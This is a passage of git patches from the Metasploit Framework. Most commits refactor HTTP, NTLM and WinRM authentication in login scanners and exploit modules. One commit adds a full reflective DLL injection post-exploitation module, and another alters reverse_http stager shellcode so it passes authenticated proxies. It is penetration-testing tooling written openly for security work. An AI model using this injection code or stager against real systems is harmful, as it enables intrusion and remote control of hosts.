= send_http_auth_ntlm( + response = send_request_cgi({ 'uri' => @uri, + 'method' => datastore['REQUESTTYPE'], 'username' => user, 'password' => pass - ) - c.close - return :abort if (resp.code == 404) - - if [200, 301, 302].include?(resp.code) - @proof = resp - return :success - end - + }) + return response rescue ::Rex::ConnectionError vprint_error("#{target_url} - Failed to connect to the web server") - return :abort + return nil end - - return :fail end - def do_http_auth_basic(user,pass) - user_pass = Rex::Text.encode_base64(user + ":" + pass) - - begin - res = send_request_cgi({ - 'uri' => @uri, - 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } - }, 25) - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if [200, 301, 302].include?(res.code) - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - - return :fail - end - - def do_http_auth_digest(user,pass,requesttype) - path = datastore['AUTH_URI'] || "/" - begin - if requesttype == "PUT" - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => 'Test123\r\n', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - elsif requesttype == "PROPFIND" - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => '', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass, - 'headers' => { 'Depth' => '0'} - }, 25) - else - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - end - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) - if ((res.code == 201) and (requesttype == "PUT")) - print_good("Trying to delete #{path}") - del_res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => 'DELETE', - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - if not (del_res.code == 204) - print_error("#{path} could be created, but not deleted again. This may have been noisy ...") - end - end - @proof = res - return :success - end - - if (res.code == 207) and (requesttype == "PROPFIND") - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - + def determine_result(response) + return :abort unless response.kind_of? Rex::Proto::Http::Response + return :abort unless response.code + return :success if [200, 301, 302].include?(response.code) return :fail end diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 65ab691e66..a3581d16b0 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -101,16 +101,13 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'") success = false srvhdr = '?' - user_pass = Rex::Text.encode_base64(user + ":" + pass) uri = normalize_uri(datastore['URI']) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } + 'username' => user, + 'password' => pass }, 25) unless (res.kind_of? Rex::Proto::Http::Response) vprint_error("http://#{rhost}:#{rport}#{uri} not responding") diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index 12f0c70422..88e9e717d6 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -40,10 +40,6 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end streams = winrm_run_cmd(datastore['CMD']) return unless streams.class == Hash print_error streams['stderr'] unless streams['stderr'] == '' diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index d8012fb723..946903113e 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -39,12 +39,8 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end each_user_pass do |user, pass| - resp,c = send_request_ntlm(test_request) + resp = send_winrm_request(test_request) if resp.nil? print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out" return diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index ed09cfd583..0c5eeb6274 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -42,12 +42,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end - - resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + resp = send_winrm_request(winrm_wql_msg(datastore['WQL'])) if resp.nil? print_error "Got no reply from the server" return diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index fda08e41c4..080803918b 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -84,8 +84,7 @@ class Metasploit3 < Msf::Auxiliary 'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol']) ], self.class) - deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword', - 'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', + deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2') end diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index d87027cadb..85ff71eca8 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q']) ], self.class) end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res.code == 401 - print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!") + print_error("401 Authorization Required! Our Credentials not accepted!") elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) print_status("Command successfully executed (according to the server).") end diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 565d73a293..9f030bbbc2 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -227,9 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote authmsg = res.headers['WWW-Authenticate'] end print_error("The remote server responded expecting authentication") - if datastore['BasicAuthUser'] and datastore['BasicAuthPass'] - print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser']) - elsif authmsg + if authmsg print_error("WWW-Authenticate: %s" % authmsg) end cleanup_instructions(rpath, name) # display cleanup info diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 07d5eb2ada..f350fe4984 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -96,9 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 7c36c1fa16..2297b52569 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -123,9 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index a46cd2c033..2757cb6e13 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -112,9 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote end def check - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - res = query_serverinfo disconnect return CheckCode::Unknown if res.nil? @@ -127,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) @@ -164,9 +161,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - mytarget = target if (target.name =~ /Automatic/) mytarget = auto_target @@ -221,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 9865c8716b..3bfd6c668e 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -67,9 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote end def go(command) - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - xml = <<-EOS diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 3484cdf86f..e162cd74f6 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(8080), - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']) ], self.class) end diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index c19096b2c8..f5b21a0499 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote [ OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), - OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']), - OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp']) + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) ], self.class) end @@ -46,12 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = build_path print_status "Uploading Payload to #{uri}" - res,c = send_digest_request_cgi({ + res = send_request_cgi({ 'uri' => uri, 'method' => 'PUT', 'data' => payload.raw, - 'DigestAuthUser' => datastore['RUSER'], - 'DigestAuthPassword' => datastore['RPASS'] + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] }, 25) unless (res and res.code == 201) print_error "Failed to upload file!" diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 666ca66d3d..c53314f136 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -66,20 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote @compat_mode = false end - def check - unless accepts_ntlm_auth - print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth" - return Msf::Exploit::CheckCode::Safe - end - - return Msf::Exploit::CheckCode::Vulnerable - end - - def exploit - unless check == Msf::Exploit::CheckCode::Vulnerable - return - end unless valid_login? print_error "Login Failure. Recheck your credentials" return @@ -141,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote def temp_dir print_status "Grabbing %TEMP%" - resp,c = send_request_ntlm(winrm_open_shell_msg) + resp = send_winrm_request(winrm_open_shell_msg) if resp.nil? print_error "Got no reply from the server" return nil @@ -152,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote end shell_id = winrm_get_shell_id(resp) cmd = "echo %TEMP%" - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id)) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id)) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id)) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id)) streams = winrm_get_cmd_streams(resp) return streams['stdout'].chomp end def check_remote_arch wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"} - resp,c = send_request_ntlm(winrm_wql_msg(wql)) + resp = send_winrm_request(winrm_wql_msg(wql)) #Default to x86 if we can't be sure return "x86" if resp.nil? or resp.code != 200 resp_tbl = parse_wql_response(resp) @@ -247,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote def valid_login? data = winrm_wql_msg("Select Name,Status from Win32_Service") - resp,c = send_request_ntlm(data) + resp = send_winrm_request(data) unless resp.code == 200 return false end From accd6208433afb177c603ceb8e24efb165c24f6d Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 23:50:30 -0600 Subject: [PATCH 24/87] Clean up pry --- lib/rex/proto/http/client.rb | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index ba46142a45..cf2cab885e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,8 +8,6 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' -require 'pry' - module Rex module Proto module Http @@ -356,15 +354,14 @@ class Client end end - return res if opts['username'].nil? or opts['username'] = '' + return res if opts['username'].nil? or opts['username'] == '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(username,password) + opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) else - opts['headers'] = { 'Authorization' => basic_auth_header(username,password)} + opts['headers'] = { 'Authorization' => basic_auth_header(opts['username'],opts['password'] )} end - req = request_cgi(opts) res = _send_recv(req,t,persist) return res From ac50c32d513f10cc71a2960c843c1574384c4810 Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Wed, 20 Feb 2013 10:02:50 -0600 Subject: [PATCH 25/87] Tested, works on server 2k8 --- modules/auxiliary/admin/smb/psexec_command.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 54be82308f..7be526fab2 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - 'Royce @R3dy__ Davis ', + 'Royce Davis @R3dy__ ', ], 'License' => MSF_LICENSE, From 0ea7247a43713b10fe8ec8fe65661eb332b134d9 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 22 Feb 2013 22:05:29 +0000 Subject: [PATCH 26/87] Initial commit --- .../windows/manage/reflective_dll_inject.rb | 98 +++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 modules/post/windows/manage/reflective_dll_inject.rb diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb new file mode 100644 index 0000000000..15e0492006 --- /dev/null +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -0,0 +1,98 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Post + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ + This module will inject into the memory of a process a specified Reflective DLL. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + )) + + register_options( + [ + OptPath.new('PATH',[true, 'Reflective DLL to inject into memory of a process.']), + OptInt.new('PID',[true, 'Process Identifier to inject of process to inject payload.']), + ], self.class) + end + + # Run Method for when run command is issued + def run + # syinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + + dll = '' + offset = nil + begin + File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } + + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end + + raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + rescue + print_error( "Failed to read and parse Dll file: #{$!}" ) + return + end + + inject_into_pid(dll, datastore['PID'], offset) + end + + def inject_into_pid(pay, pid, offset) + + if offset.nil? + print_error("Reflective Loader offset is nil.") + return + end + + if pay.nil? or pay.empty? + print_error("Invalid DLL.") + return + end + + if pid.nil? or pid == 0 + print_error("Invalid PID.") + return + end + + print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") + begin + print_status("Opening process #{pid}") + host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + print_status("Generating payload") + print_status("Allocating memory in procees #{pid}") + mem = host_process.memory.allocate(pay.length + (pay.length % 1024)) + # Ensure memory is set for execution + host_process.memory.protect(mem) + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, pay) + host_process.thread.create(mem+offset, 0) + print_good("Successfully injected payload in to process: #{pid}") + rescue ::Exception => e + print_error("Failed to Inject Payload to #{pid}!") + print_error(e.to_s) + end + end +end + From 15d505f7a9b4367f08a8d1592846f8e00d3a4bf1 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 22 Feb 2013 22:09:19 +0000 Subject: [PATCH 27/87] Msftidy --- .../windows/manage/reflective_dll_inject.rb | 44 +++++++++---------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index 15e0492006..ac7d447afe 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -12,15 +12,15 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Manage Reflective DLL Injection Module', - 'Description' => %q{ + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ This module will inject into the memory of a process a specified Reflective DLL. }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Ben Campbell '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ], - 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] )) register_options( @@ -37,23 +37,23 @@ class Metasploit3 < Msf::Post dll = '' offset = nil - begin - File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } + begin + File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } - pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) - pe.exports.entries.each do |entry| - if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) - offset = pe.rva_to_file_offset( entry.rva ) - break - end - end + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end - raise "Can't find an exported ReflectiveLoader function!" if offset == 0 - rescue - print_error( "Failed to read and parse Dll file: #{$!}" ) - return - end + raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + rescue + print_error( "Failed to read and parse Dll file: #{$!}" ) + return + end inject_into_pid(dll, datastore['PID'], offset) end @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post print_error("Invalid PID.") return end - + print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") begin print_status("Opening process #{pid}") From 788c96566f86df41f2ad6a820fdf81318bd7d0c6 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Sun, 24 Feb 2013 17:33:00 -0500 Subject: [PATCH 28/87] Allow HTTP stager to work with authenticated proxies The HttpOpenRequest function from WinINet requires the INTERNET_FLAG_KEEP_CONNECTION flag to communicate through an authenticated proxy. From MSDN ( http://tinyurl.com/chwt86j ): "Uses keep-alive semantics, if available, for the connection. This flag is required for Microsoft Network (MSN), NT LAN Manager (NTLM), and other types of authentication." Without this flag, the HTTP stager will fail when faced with a proxy that requires authentication. The Windows HTTPS stager does not have this problem. For HTTP Meterpreter to communicate through an authenticated proxy a separate patch will need to be made to the Meterpreter source code. This is at line 1125 of source/common/core.c in the Meterpreter source code. My motivation for this request is for windows/dllinject/reverse_http to download a DLL even when faced with an authenticated proxy. These changes accomplish this. Test environment: I staged a SmoothWall device with the Advanced Proxy Web Add-on. I enabled Integrated Windows Authentication with a W2K3 DC. I verified the HTTP stager authenticated to and communicated through the proxy by watching the proxy access.log --- .../shellcode/windows/x86/src/block/block_reverse_http.asm | 5 +++-- modules/payloads/stagers/windows/reverse_http.rb | 2 +- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm index 438738a99d..42c717622a 100644 --- a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm +++ b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm @@ -49,11 +49,12 @@ httpopenrequest: pop ecx xor edx, edx ; NULL push edx ; dwContext (NULL) - push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200) ; dwFlags + push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags ;0x80000000 | ; INTERNET_FLAG_RELOAD ;0x04000000 | ; INTERNET_NO_CACHE_WRITE ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT - ;0x00000200 ; INTERNET_FLAG_NO_UI + ;0x00000200 | ; INTERNET_FLAG_NO_UI + ;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION push edx ; accept types push edx ; referrer push edx ; version diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index 10555580aa..916dc30509 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -47,7 +47,7 @@ module Metasploit3 "\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" + "\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" + "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" + - "\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" + + "\x52\x68\x00\x02\x60\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" + "\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" + "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" + "\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" + From 1ce86b7adb34e8d35b5ca72a670f62867961921e Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 25 Feb 2013 14:29:10 -0600 Subject: [PATCH 29/87] Whitespace --- lib/rex/proto/http/client.rb | 8 ++++---- lib/rex/proto/http/client_request.rb | 6 +++--- modules/auxiliary/scanner/http/http_login.rb | 4 ++-- spec/lib/rex/proto/http/client_spec.rb | 2 +- 4 files changed, 10 insertions(+), 10 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cf2cab885e..b2962369ca 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -169,7 +169,7 @@ class Client # # @return [Request] def request_raw(opts={}) - opts['agent'] ||= config['agent'] + opts['agent'] ||= config['agent'] opts['data'] ||= '' opts['uri'] ||= '/' opts['cookie'] ||= config['cookie'] @@ -179,7 +179,7 @@ class Client opts['method'] ||= 'GET' opts['proto'] ||= 'HTTP' opts['query'] ||= '' - + opts['cgi'] = false opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' @@ -221,12 +221,12 @@ class Client opts['ctype'] ||= 'application/x-www-form-urlencoded' opts['vars_get'] ||= {} opts['vars_post'] ||= {} - + opts['cgi'] = true opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' + opts['version'] = opts['version'] || config['version'] || '1.1' opts['client_config'] = self.config diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 9c87834499..d307453b40 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -118,9 +118,9 @@ class ClientRequest if encode req << set_encode_uri(uri_str) else - req << uri_str + req << uri_str end - + if (qstr.length > 0) req << '?' @@ -456,4 +456,4 @@ end end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 4324e312f2..40446f68db 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -116,10 +116,10 @@ class Metasploit3 < Msf::Auxiliary def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") - + response = do_http_login(user,pass) result = determine_result(response) - + if result == :success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 28cb3bb245..937130a1f4 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -132,7 +132,7 @@ describe Rex::Proto::Http::Client do # These set_ methods all exercise the evasion opts, looks like it "should set and return the URI", :pending => excuse_lazy(:set_uri) do - + end it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) do From c104fa6d979b1eca2bdc960df67544bfb848ed65 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 26 Feb 2013 11:01:16 -0600 Subject: [PATCH 30/87] Add spec and a few fixes for set_uri --- lib/rex/proto/http/client.rb | 4 +- lib/rex/proto/http/client_request.rb | 14 +- .../lib/rex/proto/http/client_request_spec.rb | 184 ++++++++++++++++++ 3 files changed, 195 insertions(+), 7 deletions(-) create mode 100644 spec/lib/rex/proto/http/client_request_spec.rb diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cf2cab885e..22ace0507e 100644 --- a/lib/rex/proto/http/client.rb +++ 